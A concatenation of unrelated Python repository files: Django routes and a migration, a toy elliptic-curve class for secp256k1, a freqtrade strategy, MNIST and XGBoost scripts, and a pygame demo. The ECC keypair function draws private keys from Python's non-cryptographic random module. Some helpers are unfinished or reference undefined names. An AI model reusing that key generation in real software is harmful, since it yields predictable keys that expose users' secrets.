import views\n\nurlpatterns = [\n\n # Home\n path(\"\", views.index, name=\"home\"),\n # GET -> get home page\n\n path(\"login\", views.login, name=\"login\"), \n # GET -> gets login page \n # POST -> authenticates login attempt\n\n \n path(\"registration\", views.registration, name=\"registration\"), \n # GET -> gets registration page\n # POST -> authenticates registration attempt\n path(\"logout\", views.logout, name=\"logout\"),\n # POST -> destroys session\n\n # Users\n path(\"users\", views.users, name=\"users\"),\n # GET -> gets users page (dashboard)\n\n path(\"user/\", views.user, name=\"user\"),\n # GET -> gets user profile\n # POST -> handles user profile edits\n]","repo_name":"John-W-Stevens/user_dashboard_2.0","sub_path":"users_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6738553855","text":"import random\n\n\n\"\"\"\nImplementation of Elliptic Curve Cryptography (ECC) over finite fields.\n\nHuge thanks to Andrea Corbellini for his excellent blog post on ECC:\nhttps://andrea.corbellini.name/2015/05/17/elliptic-curve-cryptography-a-gentle-introduction/\n\"\"\"\n\n\ndef bits(n):\n while n:\n yield n & 1\n n >>= 1\n\n\nclass Curve:\n def __init__(self, a, b, g, order, prime=None, name=\"Custom\"):\n self.a = a\n self.b = b\n self.g = g\n self.order = order\n self.prime = prime\n self.name = name\n\n def add_point(self, p, q):\n if p is None or q is None:\n return p or q\n\n assert self.is_on_curve(p)\n assert self.is_on_curve(q)\n\n px, py = p\n qx, qy = q\n\n if px == qx and py != qy:\n # p and q are inverse points\n return None\n\n m = self.slope(p, q)\n\n rx = m ** 2 - px - qx\n ry = -(py + m * (rx - px))\n\n if self.prime:\n rx = rx % self.prime\n ry = ry % self.prime\n\n assert self.is_on_curve((rx, ry))\n\n return rx, ry\n\n def scalar_multiply(self, n, p):\n assert self.is_on_curve(p)\n\n if n % self.order == 0 or p is None:\n return None\n\n result = None\n addend = p\n\n for bit in bits(n):\n if bit == 1:\n result = self.add_point(result, addend)\n addend = self.add_point(addend, addend)\n\n return result\n\n def slope(self, p, q):\n px, py = p\n\n if p == q:\n if self.prime:\n return (3 * (px ** 2) + self.a) * self.inverse_mod(2 * py)\n else:\n return (3 * (px ** 2) + self.a) / (2 * py)\n else:\n qx, qy = q\n\n if self.prime:\n m = (py - qy) * self.inverse_mod(px - qx)\n else:\n m = (py - qy) / (px - qx)\n\n return m\n\n def inverse_mod(self, k, p=None):\n # returns the inverse of k mod (prime || self.prime)\n prime = p\n if prime is None:\n prime = self.prime\n\n if prime is None:\n raise ValueError('Curve does not have prime modulus')\n\n if k == 0:\n raise ZeroDivisionError('division by zero')\n\n if k < 0:\n return prime - self.inverse_mod(-k, prime)\n\n # Extended Euclidean algorithm\n s, old_s = 0, 1\n t, old_t = 1, 0\n r, old_r = prime, k\n\n while r != 0:\n quotient = old_r // r\n old_r, r = r, old_r - quotient * r\n old_s, s = s, old_s - quotient * s\n old_t, t = t, old_t - quotient * t\n\n gcd, x, y = old_r, old_s, old_t\n\n assert gcd == 1\n assert (k * x) % prime == 1\n\n return x % prime\n\n def is_on_curve(self, p):\n x, y = p\n\n if self.prime:\n return (y ** 2 - (x ** 3 + self.a * x + self.b)) % self.prime == 0\n else:\n return y ** 2 == x ** 3 + self.a * x + self.b\n\n def negate_point(self, p):\n assert self.is_on_curve(p)\n\n if p is None:\n return None\n\n x, y = p\n\n if self.prime:\n result = (x, -y % 
self.prime)\n else:\n result = (x, -y)\n\n assert self.is_on_curve(result)\n\n return result\n\n def make_keypair(self):\n private_key = random.randrange(1, self.order)\n public_key = self.scalar_multiply(private_key, self.g)\n\n return private_key, public_key\n\n\ndef secp256k1():\n a = 0\n b = 7\n order = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141\n prime = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_FFFFFC2F\n name = 'secp256k1'\n\n x = 0x79BE667E_F9DCBBAC_55A06295_CE870B07_029BFCDB_2DCE28D9_59F2815B_16F81798\n y = 0x483ADA77_26A3C465_5DA4FBFC_0E1108A8_FD17B448_A6855419_9C47D08F_FB10D4B8\n g = (x, y)\n\n return Curve(a, b, g, order, prime, name)","repo_name":"SamRond/encryption_methods","sub_path":"curves/ecc.py","file_name":"ecc.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27005409196","text":"# --- Do not remove these libs ---\nfrom freqtrade.strategy.interface import IStrategy\nfrom typing import Dict, List\nfrom functools import reduce\nfrom pandas import DataFrame\n# --------------------------------\n\nimport talib.abstract as ta\nimport numpy as np\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nimport datetime\nfrom technical.util import resample_to_interval, resampled_merge\nfrom datetime import datetime, timedelta\nfrom freqtrade.persistence import Trade\nfrom freqtrade.strategy import stoploss_from_open, merge_informative_pair, DecimalParameter, IntParameter, CategoricalParameter\n\nSMA = 'SMA'\nEMA = 'EMA'\n\n# Buy hyperspace params:\nbuy_params = {\n \"base_nb_candles_buy\": 30,\n \"buy_trigger\": SMA,\n \"low_offset\": 0.92,\n}\n\n# Sell hyperspace params:\nsell_params = {\n \"base_nb_candles_sell\": 41,\n \"high_offset\": 1.026,\n \"sell_trigger\": SMA,\n}\n\nclass SMAOffsetStrategy(IStrategy):\n INTERFACE_VERSION = 2\n\n # ROI table:\n minimal_roi = {\"0\": 1}\n\n # Stoploss:\n stoploss = -0.5\n\n base_nb_candles_buy = IntParameter(5, 80, default=buy_params['base_nb_candles_buy'], space='buy')\n base_nb_candles_sell = IntParameter(5, 80, default=sell_params['base_nb_candles_sell'], space='sell')\n low_offset = DecimalParameter(0.9, 0.99, default=buy_params['low_offset'], space='buy')\n high_offset = DecimalParameter(0.99, 1.1, default=sell_params['high_offset'], space='sell')\n buy_trigger = CategoricalParameter([SMA, EMA], default=buy_params['buy_trigger'], space='buy')\n sell_trigger = CategoricalParameter([SMA, EMA], default=sell_params['sell_trigger'], space='sell')\n\n # Trailing stop:\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0\n trailing_only_offset_is_reached = False\n\n # Optimal timeframe for the strategy\n timeframe = '5m'\n\n use_sell_signal = True\n sell_profit_only = False\n\n process_only_new_candles = True\n startup_candle_count = 30\n\n plot_config = {\n 'main_plot': {\n 'ma_offset_buy': {'color': 'orange'},\n 'ma_offset_sell': {'color': 'orange'},\n },\n }\n\n use_custom_stoploss = False\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n # uncomment for plotting\n\n #if self.buy_trigger.value == 'EMA':\n # dataframe['ma_buy'] = ta.EMA(dataframe, timeperiod=self.base_nb_candles_buy.value)\n #else:\n # dataframe['ma_buy'] = ta.SMA(dataframe, timeperiod=self.base_nb_candles_buy.value)\n\n #if self.sell_trigger.value == 'EMA':\n # dataframe['ma_sell'] = ta.EMA(dataframe, 
timeperiod=self.base_nb_candles_sell.value)\n #else:\n # dataframe['ma_sell'] = ta.SMA(dataframe, timeperiod=self.base_nb_candles_sell.value)\n\n #dataframe['ma_offset_buy'] = dataframe['ma_buy'] * self.low_offset.value\n #dataframe['ma_offset_sell'] = dataframe['ma_sell'] * self.high_offset.value\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n if self.buy_trigger.value == EMA:\n dataframe['ma_buy'] = ta.EMA(dataframe, timeperiod=int(self.base_nb_candles_buy.value))\n else:\n dataframe['ma_buy'] = ta.SMA(dataframe, timeperiod=int(self.base_nb_candles_buy.value))\n\n dataframe['ma_offset_buy'] = dataframe['ma_buy'] * self.low_offset.value\n\n dataframe.loc[\n (\n (dataframe['close'] < dataframe['ma_offset_buy']) &\n (dataframe['volume'] > 0)\n ),\n 'buy'] = 1\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n if self.sell_trigger.value == EMA:\n dataframe['ma_sell'] = ta.EMA(dataframe, timeperiod=int(self.base_nb_candles_sell.value))\n else:\n dataframe['ma_sell'] = ta.SMA(dataframe, timeperiod=int(self.base_nb_candles_sell.value))\n\n dataframe['ma_offset_sell'] = dataframe['ma_sell'] * self.high_offset.value\n\n dataframe.loc[\n (\n (dataframe['close'] > dataframe['ma_offset_sell']) &\n (dataframe['volume'] > 0)\n ),\n 'sell'] = 1\n return dataframe\n","repo_name":"Regul777/trade-stuff-public","sub_path":"user_data/strategies/sma_offset_strategy.py","file_name":"sma_offset_strategy.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23983194197","text":"from __future__ import print_function\n\nfrom builtins import range\nfrom builtins import object\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom past.builtins import xrange\n\n\ndef loss(X, std, input_size, hidden_size, output_size, y=None, reg=0.0 ):\n \"\"\"\n Compute the loss and gradients for a two layer fully connected neural\n network.\n\n Inputs:\n - X: Input data of shape (N, D). Each X[i] is a training sample.\n - y: Vector of training labels. y[i] is the label for X[i], and each y[i] is\n an integer in the range 0 <= y[i] < C. This parameter is optional; if it\n is not passed then we only return scores, and if it is passed then we\n instead return the loss and gradients.\n - reg: Regularization strength.\n\n Returns:\n If y is None, return a matrix scores of shape (N, C) where scores[i, c] is\n the score for class c on input X[i].\n\n If y is not None, instead return a tuple of:\n - loss: Loss (data loss and regularization loss) for this batch of training\n samples.\n - grads: Dictionary mapping parameter names to gradients of those parameters\n with respect to the loss function; has the same keys as self.params.\n \"\"\"\n # Unpack variables from the params dictionary\n W1, b1 = std * np.random.randn(input_size,\n hidden_size), np.zeros(hidden_size)\n W2, b2 = std * np.random.randn(hidden_size,\n output_size), np.zeros(output_size)\n N, D = X.shape\n H, C = W2.shape\n\n # Compute the forward pass\n scores = None\n #############################################################################\n # TODO: Perform the forward pass, computing the class scores for the input. #\n # Store the result in the scores variable, which should be an array of #\n # shape (N, C). 
#\n #############################################################################\n # *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****\n\n\n a1 = X.dot(W1) + b1 # (N, H)\n dW1 = (X.T).dot(np.ones_like(a1)) # (D,H)\n db1 = (np.ones((N,1)).T).dot(np.ones_like(a1)) #(1,H)\n\n cache = np.ones((N,H))\n cache[a1 < 0] = 0 #(N,H)\n a1[a1 < 0] = 0 #(N,H)\n da1_cache = cache * np.ones_like(a1) #(N,H)\n dW1 = X.T.dot(da1_cache) # (D,H)\n db1 = (np.ones((N,1)).T).dot(da1_cache) #(1,H)\n\n scores = a1.dot(W2) + b2 #(N,C)\n\n\n # *****END OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****\n\n # If the targets are not given then jump out, we're done\n if y is None:\n return scores\n\n # Compute the loss\n loss = None\n #############################################################################\n # TODO: Finish the forward pass, and compute the loss. This should include #\n # both the data loss and L2 regularization for W1 and W2. Store the result #\n # in the variable loss, which should be a scalar. Use the Softmax #\n # classifier loss. #\n #############################################################################\n # *****START OF YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****\n\n dW2 = a1.T.dot(np.ones_like(scores)) #(H,C)\n db2 = (np.ones((N,1)).T).dot(np.ones_like(scores)) #(1,C)\n #da1 = (W2.dot(np.ones((C,N)))).T #(N,H)\n da1 = np.ones_like(scores).dot(W2.T) #(N,H)\n dW1 = X.T.dot(da1 * da1_cache) #(D,H)\n db1 = (np.ones((N,1)).T).dot(da1 * da1_cache) #(1,H)\n\n scores_max = np.max(scores, axis=1) #(N,)\n scores_max_arg = np.argmax(scores, axis=1) #(N,)\n \n scores -= scores_max.reshape(-1,1) # (N,C)\n dscores_max_pre = np.zeros_like(scores) #(N,C)\n dscores_max_pre[range(N),scores_max_arg] = 1 #(N,C)\n\n dW2 = a1.T.dot(np.ones_like(scores)) - a1.T.dot(dscores_max_pre) # (H,C)\n db2 = (np.ones((N, 1)).T).dot(np.ones_like(scores)\n ) - (np.ones((N, 1)).T).dot(dscores_max_pre) # (1,C)\n da1 = np.ones_like(scores).dot(W2.T) - (np.ones_like(scores).dot(np.ones((C,1)))) * dscores_max_pre.dot(W2.T) # (N,H)\n dW1 = X.T.dot(da1 * da1_cache) # (D,H)\n db1 = (np.ones((N,1)).T).dot(da1 * da1_cache) #(1,H)\n\n scores = np.exp(scores) # (N,C)\n dW2 = a1.T.dot(scores * np.ones_like(scores)) - \\\n a1.T.dot(scores * dscores_max_pre) # (H,C)\n db2 = (np.ones((N, 1)).T).dot(scores * np.ones_like(scores)\n ) - (np.ones((N, 1)).T).dot(scores * dscores_max_pre) # (1,C)\n da1 = (scores * np.ones_like(scores)).dot(W2.T) - \\\n (scores * np.ones_like(scores)).dot(np.ones((C, 1))) * \\\n dscores_max_pre.dot(W2.T) # (N,H)\n dW1 = X.T.dot(da1 * da1_cache) # (D,H)\n db1 = (np.ones((N, 1)).T).dot(da1 * da1_cache) # (1,H)\n\n\n scores_correct = np.zeros_like(scores)\n scores_correct[range(N),y] = 1\n scores_correct = scores_correct * scores\n\n loss = -np.log(np.sum(scores_correct, axis=1) /\n np.sum(scores, axis=1)) # (N,)\n \n scores_sum = np.sum(scores, axis=1).reshape(N,1)\n scores_correct_exp = (np.sum(scores_correct, axis=1)).reshape(N, 1)\n '''\n scores[range(N), y] = -(scores_sum - scores_correct_exp).flatten()\n scores[range(N), scores_max_arg] = 1\n dW2 = a1.T.dot((-scores_correct_exp / scores_sum**2) *\n scores / -(scores_correct_exp / scores_sum))\n '''\n dW21 = a1.T.dot(scores_correct * (scores - scores * dscores_max_pre) + scores * scores_correct) # (H,C)\n \n \n scores[range(N), y] = -(scores_sum - scores_correct_exp).flatten()\n scores[range(N), scores_max_arg] = 1\n dW22 = a1.T.dot((-scores_correct_exp / scores_sum**2) *\n scores / -(scores_correct_exp / scores_sum))\n \n\n # *****END OF 
YOUR CODE (DO NOT DELETE/MODIFY THIS LINE)*****\n\n    return dW22-dW21\n\nstd = 1e-4\ninput_size, hidden_size, output_size = 3,5,4\nX = np.random.randn(5, 3)\n# one label per row of X (N = 5), kept as a flat vector for fancy indexing below\ny = np.array([1, 3, 2, 0, 1])\nb = loss(X, std, input_size, hidden_size, output_size, y)\nc = np.sum(b)\nprint(b)\n","repo_name":"bearwangcai/CS","sub_path":"assignment1/cs231n/classifiers/test_ver.py","file_name":"test_ver.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"72415520831","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom campaigns.models import Campaign\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('campaigns', '0002_auto_20150517_0117'),\n        ('characters', '0006_auto_20150524_0031'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='character',\n            name='campaign',\n            field=models.ForeignKey(default=Campaign.objects.get(pk=2).id, to='campaigns.Campaign'),\n            preserve_default=False,\n        ),\n    ]\n","repo_name":"DavyK/opentable","sub_path":"characters/migrations/0007_character_campaign.py","file_name":"0007_character_campaign.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} {"seq_id":"7245293371","text":"import os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\n\nfrom model import MNISTClassifier\nfrom utils import *\n\n# use GPU if available, otherwise use the CPU\nprint(\"GPU available: {}\".format(torch.cuda.is_available()))\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n# set up model\nmodel = MNISTClassifier(pretrained = True).to(device)\n\ntransform = transforms.Compose([\n    transforms.ToTensor(),\n    transforms.Normalize((0.5,), (0.5,)), # normalize images\n])\n\n# set up train and test datasets\nmnist_train = datasets.MNIST(\"data\", train = True, transform = transform, target_transform = None, download = True)\nmnist_test = datasets.MNIST(\"data\", train = False, transform = transform, target_transform = None, download = True)\n\nprint(\"Train size: {}\".format(len(mnist_train)))\nprint(\"Test size: {}\".format(len(mnist_test)))\n\n# set up train and test dataset loaders\ntrain_loader = torch.utils.data.DataLoader(mnist_train, batch_size = args.batch_size, shuffle = True)\ntest_loader = torch.utils.data.DataLoader(mnist_test, batch_size = 16, shuffle = True)\n\n# set up optimizer and loss function\nif args.optim == 'adam':\n    optimizer = optim.Adam(model.parameters(), lr = args.learning_rate, betas = (0.9, 0.999))\nelse:\n    optimizer = optim.SGD(model.parameters(), lr = args.learning_rate, momentum = 0.9)\nloss_func = nn.CrossEntropyLoss(reduction = 'sum').to(device)\n\nprint(\"\\nTraining on MNIST:\")\nprint(\"\\tNum epochs: {}\".format(args.num_epochs))\nprint(\"\\tLearning rate: {}\".format(args.learning_rate))\nprint(\"\\tBatch size: {}\".format(args.batch_size))\n\n# train the model\nfor epoch in range(args.num_epochs):\n    for batch_id, sample in enumerate(train_loader):\n        # get the data (images and labels)\n        imgs, labels = sample\n        imgs = imgs.to(device)\n        true_labels = labels.to(device)\n\n        # make predictions and calculate loss\n        pred_scores = model(imgs).to(device)\n        loss = loss_func(pred_scores, true_labels)\n\n        # weight update\n        model.zero_grad()\n        loss.backward()\n        
optimizer.step()\n\n # log info for the user\n if batch_id % 10 == 0:\n print(\"(train) => Epoch {}/{} - Batch {}/{} - Loss: {}\".format(epoch+1, args.num_epochs, batch_id, len(train_loader), loss.item()))\n\n# test the model\ncorrect = 0\nfor batch_id, sample in enumerate(test_loader):\n # get the data (images and labels)\n imgs, labels = sample\n imgs = imgs.to(device)\n true_labels = labels.to(device)\n\n # make predictions for each class\n pred_scores = model(imgs).to(device)\n\n # take the highest class prediction and count how many labels matched the ground-truth labels\n pred_label = torch.argmax(pred_scores, 1) # i.e. if predictions were [0.1, 0.0, 0.6, ..., 0.0], it'd return index/class 2\n correct += torch.sum(pred_label == true_labels).item() # count how many were correct\n\n # log info for the user\n if batch_id % 100 == 0:\n print(\"(test) => Batch {}/{}\".format(batch_id, len(test_loader)))\ntest_accuracy = correct / len(mnist_test)\nprint(\"Test accuracy: {}%\".format(round(test_accuracy * 100.0, 2)))\n\n# save the model\nmodel_path = os.path.join(\"models\", \"mnist_model\")\nif not os.path.isdir(\"models\"):\n os.mkdir(\"models\")\nif os.path.exists(model_path): # remove previously saved model\n os.remove(model_path)\ntorch.save(model.state_dict(), model_path)\n","repo_name":"kingsman142/mnist-classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"17604077179","text":"import CTK\n\nUSUAL_STATIC_FILES = ['/favicon.ico', '/robots.txt', '/crossdomain.xml',\n '/sitemap.xml', '/sitemap.xml.gz']\n\n\ndef Add_Usual_Static_Files (rule_pre, files = USUAL_STATIC_FILES):\n CTK.cfg['%s!match'%(rule_pre)] = 'fullpath'\n CTK.cfg['%s!handler'%(rule_pre)] = 'file'\n CTK.cfg['%s!handler!iocache'%(rule_pre)] = '1'\n CTK.cfg['%s!encoder!gzip'%(rule_pre)] = '0'\n CTK.cfg['%s!encoder!deflate'%(rule_pre)] = '0'\n CTK.cfg['%s!expiration'%(rule_pre)] = 'time'\n CTK.cfg['%s!expiration!time'%(rule_pre)] = '1h'\n\n n = 1\n for file in files:\n CTK.cfg['%s!match!fullpath!%d'%(rule_pre,n)] = file\n n += 1\n\n","repo_name":"cherokee/wizards2","sub_path":"vserver.py","file_name":"vserver.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"27731690292","text":"import numpy as np\nfrom xgboost import XGBRegressor\nimport math\n\n\ndef get_mape(y_true, y_pred):\n \"\"\"\n Compute mean absolute percentage error (MAPE)\n \"\"\"\n y_true, y_pred = np.array(y_true), np.array(y_pred)\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\n\ndef get_mae(a, b):\n \"\"\"\n Comp mean absolute error e_t = E[|a_t - b_t|]. a and b can be lists.\n Returns a vector of len = len(a) = len(b)\n \"\"\"\n return np.mean(abs(np.array(a)-np.array(b)))\n\n\ndef get_rmse(a, b):\n \"\"\"\n Comp RMSE. a and b can be lists.\n Returns a scalar.\n \"\"\"\n return math.sqrt(np.mean((np.array(a)-np.array(b))**2))\n\n\ndef pred_xgboost(model, X_test_ex_adj_close, N, H, prev_vals, prev_mean_val, prev_std_val):\n \"\"\"\n Do recursive forecasting using xgboost\n Inputs\n model : the xgboost model\n X_test_ex_adj_close: features of the test set, excluding adj_close_scaled values\n N : for feature at day t, we use lags from t-1, t-2, ..., t-N as features\n H : forecast horizon\n prev_vals : numpy array. 
If predict at time t,\n prev_vals will contain the N unscaled values at t-1, t-2, ..., t-N\n prev_mean_val : the mean of the unscaled values at t-1, t-2, ..., t-N\n prev_std_val : the std deviation of the unscaled values at t-1, t-2, ..., t-N\n Outputs\n Times series of predictions. Numpy array of shape (H,). This is unscaled.\n \"\"\"\n forecast = prev_vals.copy()\n\n for n in range(H):\n forecast_scaled = (forecast[-N:] - prev_mean_val) / prev_std_val\n\n # Create the features dataframe\n X = X_test_ex_adj_close[n:n + 1].copy()\n for n in range(N, 0, -1):\n X.loc[:, \"adj_close_scaled_lag_\" + str(n)] = forecast_scaled[-n]\n\n # Do prediction\n est_scaled = model.predict(X)\n\n # Unscale the prediction\n forecast = np.concatenate([forecast,\n np.array((est_scaled * prev_std_val) + prev_mean_val).reshape(1, )])\n\n # Comp. new mean and std\n prev_mean_val = np.mean(forecast[-N:])\n prev_std_val = np.std(forecast[-N:])\n\n return forecast[-H:]\n\n\ndef train_pred_eval_model(X_train_scaled,\n y_train_scaled,\n X_test_ex_adj_close,\n y_test,\n N,\n H,\n prev_vals,\n prev_mean_val,\n prev_std_val,\n seed=100,\n n_estimators=100,\n max_depth=3,\n learning_rate=0.1,\n min_child_weight=1,\n subsample=1,\n colsample_bytree=1,\n colsample_bylevel=1,\n gamma=0):\n '''\n Train model, do prediction, scale back to original range and do evaluation\n Use XGBoost here.\n Inputs\n X_train_scaled : features for training. Scaled to have mean 0 and variance 1\n y_train_scaled : target for training. Scaled to have mean 0 and variance 1\n X_test_ex_adj_close: features of the test set, excluding adj_close_scaled values\n y_test : target for test. Actual values, not scaled.\n N : for feature at day t, we use lags from t-1, t-2, ..., t-N as features\n H : forecast horizon\n prev_vals : numpy array. If predict at time t,\n prev_vals will contain the N unscaled values at t-1, t-2, ..., t-N\n prev_mean_val : the mean of the unscaled values at t-1, t-2, ..., t-N\n prev_std_val : the std deviation of the unscaled values at t-1, t-2, ..., t-N\n seed : model seed\n n_estimators : number of boosted trees to fit\n max_depth : maximum tree depth for base learners\n learning_rate : boosting learning rate (xgb’s “eta”)\n min_child_weight : minimum sum of instance weight(hessian) needed in a child\n subsample : subsample ratio of the training instance\n colsample_bytree : subsample ratio of columns when constructing each tree\n colsample_bylevel : subsample ratio of columns for each split, in each level\n gamma :\n Outputs\n rmse : root mean square error of y_test and est\n mape : mean absolute percentage error of y_test and est\n mae : mean absolute error of y_test and est\n est : predicted values. 
Same length as y_test\n '''\n model_seed = 100\n model = XGBRegressor(objective='reg:squarederror',\n seed=model_seed,\n n_estimators=n_estimators,\n max_depth=max_depth,\n learning_rate=learning_rate,\n min_child_weight=min_child_weight,\n subsample=subsample,\n colsample_bytree=colsample_bytree,\n colsample_bylevel=colsample_bylevel,\n gamma=gamma)\n\n # Train the model\n model.fit(X_train_scaled, y_train_scaled)\n\n # Get predicted labels and scale back to original range\n est = pred_xgboost(model, X_test_ex_adj_close, N, H, prev_vals, prev_mean_val, prev_std_val)\n\n # Calculate RMSE, MAPE, MAE\n rmse = get_rmse(y_test, est)\n mape = get_mape(y_test, est)\n mae = get_mae(y_test, est)\n\n return rmse, mape, mae, est, model.feature_importances_\n\n\ndef do_scaling(df, N):\n \"\"\"\n Do scaling for the adj_close and lag cols\n \"\"\"\n df[df.columns[0]] = (df['adj_close'] - df['adj_close_mean']) / df['adj_close_std']\n for n in range(N, 0, -1):\n df.loc[:, 'adj_close_scaled_lag_' + str(n)] = \\\n (df['adj_close_lag_' + str(n)] - df['adj_close_mean']) / df['adj_close_std']\n\n # Remove adj_close_lag column which we don't need anymore\n df.drop(['adj_close_lag_' + str(n)], axis=1, inplace=True)\n\n return df\n\n\ndef get_error_metrics(df, train_size, N, H, seed=100, n_estimators=100, max_depth=3, learning_rate=0.1,\n min_child_weight=1, subsample=1, colsample_bytree=1, colsample_bylevel=1, gamma=0):\n \"\"\"\n Given a series consisting of both train+validation, do predictions of forecast horizon H on the validation set,\n at H/2 intervals.\n Inputs\n df : train + val dataframe. len(df) = train_size + val_size\n train_size : size of train set\n N : for feature at day t, we use lags from t-1, t-2, ..., t-N as features\n H : forecast horizon\n seed : model seed\n n_estimators : number of boosted trees to fit\n max_depth : maximum tree depth for base learners\n learning_rate : boosting learning rate (xgb’s “eta”)\n min_child_weight : minimum sum of instance weight(hessian) needed in a child\n subsample : subsample ratio of the training instance\n colsample_bytree : subsample ratio of columns when constructing each tree\n colsample_bylevel : subsample ratio of columns for each split, in each level\n gamma :\n Outputs\n mean of rmse, mean of mape, mean of mae, dictionary of predictions\n \"\"\"\n rmse_list = [] # root mean square error\n mape_list = [] # mean absolute percentage error\n mae_list = [] # mean absolute error\n preds_dict = {}\n\n # Do scaling\n # df = do_scaling(df, N)\n\n # Get list of features\n features = list(set(df.columns) - {df.columns[0]})\n\n for i in range(train_size, len(df) - H + 1, int(H / 2)):\n # Split into train and test\n train = df[i - train_size:i].copy()\n test = df[i:i + H].copy()\n\n # Drop the NaNs in train\n train.dropna(axis=0, how='any', inplace=True)\n\n # Split into X and y\n X_train_scaled = train[features]\n y_train_scaled = train[df.columns[0]]\n X_test_ex_adj_close = test[features]\n y_test = test['adj_close']\n prev_vals = train[-N:]['adj_close'].to_numpy()\n prev_mean_val = test.iloc[0]['adj_close_mean']\n prev_std_val = test.iloc[0]['adj_close_std']\n\n rmse, mape, mae, est, _ = train_pred_eval_model(X_train_scaled,\n y_train_scaled,\n X_test_ex_adj_close,\n y_test,\n N,\n H,\n prev_vals,\n prev_mean_val,\n prev_std_val,\n seed=seed,\n n_estimators=n_estimators,\n max_depth=max_depth,\n learning_rate=learning_rate,\n min_child_weight=min_child_weight,\n subsample=subsample,\n colsample_bytree=colsample_bytree,\n 
colsample_bylevel=colsample_bylevel,\n gamma=gamma)\n # print(\"N = \" + str(N) + \", i = \" + str(i) + \", rmse = \" + str(rmse) + \", mape = \" + str(mape) + \", mae = \" + str(mae))\n\n rmse_list.append(rmse)\n mape_list.append(mape)\n mae_list.append(mae)\n preds_dict[i] = est\n\n return np.mean(rmse_list), np.mean(mape_list), np.mean(mae_list), preds_dict\n\n\n\ndef xgboost_aux():\n import time\n from _collections import defaultdict\n\n param_label = 'n_estimators'\n param_list = range(1, 61, 2)\n\n param2_label = 'max_depth'\n param2_list = [2, 3, 4, 5, 6, 7, 8, 9]\n\n error_rate = defaultdict(list)\n\n tic = time.time()\n for param in tqdm_notebook(param_list):\n for param2 in param2_list:\n rmse_mean, mape_mean, mae_mean, _ = get_error_metrics(train_val,\n train_size,\n N_opt,\n H,\n seed=model_seed,\n n_estimators=param,\n max_depth=param2,\n learning_rate=learning_rate,\n min_child_weight=min_child_weight,\n subsample=subsample,\n colsample_bytree=colsample_bytree,\n colsample_bylevel=colsample_bylevel,\n gamma=gamma)\n\n # Collect results\n error_rate[param_label].append(param)\n error_rate[param2_label].append(param2)\n error_rate['rmse'].append(rmse_mean)\n error_rate['mape'].append(mape_mean)\n error_rate['mae'].append(mae_mean)\n\n error_rate = pd.DataFrame(error_rate)\n toc = time.time()\n print(\"Minutes taken = {0:.2f}\".format((toc - tic) / 60.0))\n\n error_rate","repo_name":"heliodomingos/autoSeries","sub_path":"train_module/xg_aux.py","file_name":"xg_aux.py","file_ext":"py","file_size_in_byte":12043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"30897502872","text":"import pygame\n\n# Initialize Pygame\npygame.init()\n\n# Set the screen size and caption\nsize = (700, 500)\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Mouse Game\")\n\n# Set the background color\nbg_color = (255, 255, 255)\n\n# Create a variable to control the game loop\nrunning = True\n\n# Start the game loop\nwhile running:\n # Handle events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # Get the mouse position\n mouse_pos = pygame.mouse.get_pos()\n\n # Clear the screen\n screen.fill(bg_color)\n\n # Draw a circle at the mouse position\n pygame.draw.circle(screen, (255, 0, 0), mouse_pos, 50)\n\n # Update the screen\n pygame.display.flip()\n\n# Exit Pygame\npygame.quit()","repo_name":"Shreyaanp/Wireless-Wizard","sub_path":"interaction.py","file_name":"interaction.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21549352066","text":"import tensorflow as _tf\nimport dataset.csv as csv\nimport os as _os\nfrom utils import logutil as _logutil\nfrom . 
